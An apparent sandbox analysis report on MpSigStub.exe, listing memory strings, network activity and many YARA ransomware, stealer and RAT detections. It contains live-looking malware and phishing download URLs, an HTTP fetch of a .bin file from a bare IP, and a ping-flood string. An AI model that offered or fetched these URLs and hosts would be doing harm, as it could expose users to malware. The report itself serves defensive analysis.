Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: https://www.oratoriostsurukyo.com.br/arquivos/teste.hta
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://www.palmtipsheet.com/wp-content/calc1.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.pamelamann.co.za/1/shola/doc/purchase.doc
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: https://www.paypal.com
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: https://www.piriform.com/inapp/installerofferpage
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.pmc-services.de
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: https://www.protectalaskasfuture.com/wp-content/upgrade/new.php
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://www.realvnc.com
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.sanlorenzoyacht.com/newsl/uploads/docs/43.dotm
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.slgroupsrl.com/vendo
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.slgroupsrl.com/vendo/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: https://www.slgroupsrl.com/vendorupdate/instreetwork.php
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: https://www.spectrumhosting.co.za/hello-3.wav
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://www.sugarsync.com/pf
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://www.tamim.pro/wp-content/themes/beonepage-pro/languages/msg.j
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: https://www.teamviewer.com
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.tecel.cl/.well-known/frank/next.php
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://www.tecel.cl/content/ak/next.php
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: https://www.thegoodplan.ovh/promo.php
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.threadpaints.com/js/status.js
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: https://www.torproject.org/download/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: https://www.tsuburaya-prod.co.jp/wp-content/plugins/wp-ogp/sa.exe
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.ultimateislandguide.com//cache/.p/next.php
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: https://www.upload.ee/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://www.upload.ee/download/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: https://www.vacsax.co.uk/wp-admin/mile/graceserver.php
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: https://www.vespang.cf/ideshow/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: https://www.vespang.cf/ideshow/post.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://www.yaplakal.com/go/?https://yothuful-lichretman-bboae1.netlify.app#juangondo
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: https://www.zimsgizmos.biz/wp-content/themes/zgf/images/headers/hp.gf
Source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp	String found in binary or memory: https://www2.bancobrasil.com.br/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://xf.zp-inwsice.online/?e=claire
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://xw.kh-imoice.online/?e=info
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: https://y/ews/Exchange.asmx
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: https://yerl.org/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: https://ygmservices.com/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: https://yoga.webnatico.com/wp-admin/maint/msci.exe
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: https://youc1000.com/f.html#/ywxsaxnvbi5ly2tszxlay3nnas5jb20=
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://zangomart.com/soft/order/information/adobe2/index.htm
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://zerofatality.net/wp-includes/js/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://zerofatality.net/wp-includes/js/reportpdfnew.php
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://zerofatality.org/wp-admin/js/widgets/reportdhlnew.php
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: https://zk.fx-invoice.online/?e=info
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: https://zxc.amiralrouter.online/testxxxx.exe

Source: unknown

DNS traffic detected: queries for: septnet.duckdns.org

Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com/www.google.com/] equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: "http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: "https://www.facebook.com/login.php] equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: .src='http://www.facebook.com/plugins/like.php?href='+encodeuricomponent( equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: 4src='http://www.facebook.com/plugins/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: 4src='http://www.facebook.com/widgets/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: 67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0x equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: @FB_www.facebook.com/modz.ryan_ProtectedBy_RyanBorland_0xx equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: G"http://www.youtube.com/watch?v=nqpod5at30g" equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: Hping -t -w 1 -l 65500 www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: YouTube http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: a67.213.219.238www.youtube.com67.213.219.238ph.yahoo.com/?p=us127.0.0.1http://www.search.ask.com equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: dc:\arquivos de programas\internet explorer\iexplore.exe http://www.youtube.com/watch?v=Vjp7vgj119s equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.baidu.com/s?wd=http://www.google.cn/search?hl=zh-CN&q=http://search.cn.yahoo.com/search?p=http://www.sogou.com/web?sogouhome=&shuru=shou&query=http://so.163.com/search.php?q= equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/srch?set= equals www.rambler.ru (Rambler)
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.yahoo.com equals www.yahoo.com (Yahoo)
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://www.youtube.com/watch?v= equals www.youtube.com (Youtube)
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login.php equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: src='http://www.facebook.com/plugins/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: src='http://www.facebook.com/widgets/like.php?href equals www.facebook.com (Facebook)
Source: MpSigStub.exe, 00000026.00000003.18333419968.00000138BCD37000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com/ equals www.yahoo.com (Yahoo)

Source: global traffic

HTTP traffic detected: GET /mvbs/Host_hKVPgVgQ234.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50
Source: unknown	TCP traffic detected without corresponding DNS query: 178.32.63.50

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected LaZagne password dumper

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Linux EvilGnome RC5 key

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp

Binary or memory string: DirectDrawCreateEx

Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

E-Banking Fraud:

Yara detected Arcane Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Baldr

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Njrat

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18300303304.00000138BE24D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18301189769.00000138BE6F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands:

Yara detected BlackMoon Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Ragnarok ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Avaddon Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected BLACKMatter Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Jigsaw

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AESCRYPT Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Rapid ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected RansomwareGeneric

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Ouroboros ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Fiesta Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Chaos Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected TeslaCrypt Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Mock Ransomware

Show sources

Source: Yara match	File source: 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Conti ransomware

Show sources

Source: Yara match	File source: 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18323946155.00000138BDB98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18357184238.00000138BD9CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18336867211.00000138BDB98000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected NoCry Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected ByteLocker Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected RegretLocker Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Crypt ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Clop Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected LockBit ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected LOCKFILE ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Cerber ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18437333856.00000138BE03B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18432672691.00000138BDF33000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Rhino ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Niros Ransomware

Show sources

Source: Yara match	File source: 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Buran Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected VHD ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Netwalker ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Jcrypt Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Delta Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected LazParking Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Zeppelin Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Apis Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Wannacry ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected MegaCortex Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Cobra Locker ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected RekenSom ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Babuk Ransomware

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Nemty Ransomware

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
